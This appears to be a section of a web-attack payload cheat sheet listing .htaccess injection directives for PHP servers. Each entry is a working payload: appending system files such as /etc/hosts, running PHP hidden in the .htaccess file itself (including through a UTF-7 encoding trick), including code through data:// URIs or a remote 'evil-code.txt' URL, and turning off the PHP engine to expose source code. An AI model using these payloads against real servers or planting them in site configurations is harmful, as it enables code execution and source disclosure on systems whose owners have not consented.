5.1.7. htaccess injection payload

5.1.7.1. file inclusion

  1. php_value auto_append_file /etc/hosts

5.1.7.2. code execution

  1. php_value auto_append_file .htaccess
  2. #<?php phpinfo();

5.1.7.3. file inclusion

  1. php_flag allow_url_include 1
  2. php_value auto_append_file data://text/plain;base64,PD9waHAgcGhwaW5mbygpOw==
  3. #php_value auto_append_file data://text/plain,%3C%3Fphp+phpinfo%28%29%3B
  4. #php_value auto_append_file https://sektioneins.de/evil-code.txt

5.1.7.4. code execution with UTF-7

  1. php_flag zend.multibyte 1
  2. php_value zend.script_encoding "UTF-7"
  3. php_value auto_append_file .htaccess
  4. #+ADw?php phpinfo()+ADs

5.1.7.5. Source code disclosure

  1. php_flag engine 0